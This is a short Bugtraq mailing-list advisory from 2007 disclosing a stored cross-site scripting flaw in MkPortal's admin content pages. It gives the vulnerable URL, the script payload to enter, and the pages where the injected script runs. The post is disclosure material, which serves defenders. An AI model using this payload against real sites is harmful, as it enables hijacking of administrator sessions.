[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MkPortal Admin XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MkPortal Admin XSS
From: info@xxxxxxxxxxx
Date: 5 Jan 2007 04:52:18 -0000

MkPortal Admin XSS

Discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

Go to: /mkportal/admin.php?ind=ad_contents&op=contents_new

In both fields write:
"><script>alert(document.cookie)</script>
and press save.

Alert will appear here: /mkportal/admin.php?ind=ad_contents
and here: /mkportal/admin.php?ind=ad_contents&op=contents_edit&idc=*
where * is the ID of the page.

Prev by Date: [USN-400-1] Thunderbird vulnerabilities
Next by Date: IG Shop remote code execution
Previous by thread: [USN-400-1] Thunderbird vulnerabilities
Next by thread: IG Shop remote code execution
Index(es):
- Date
- Thread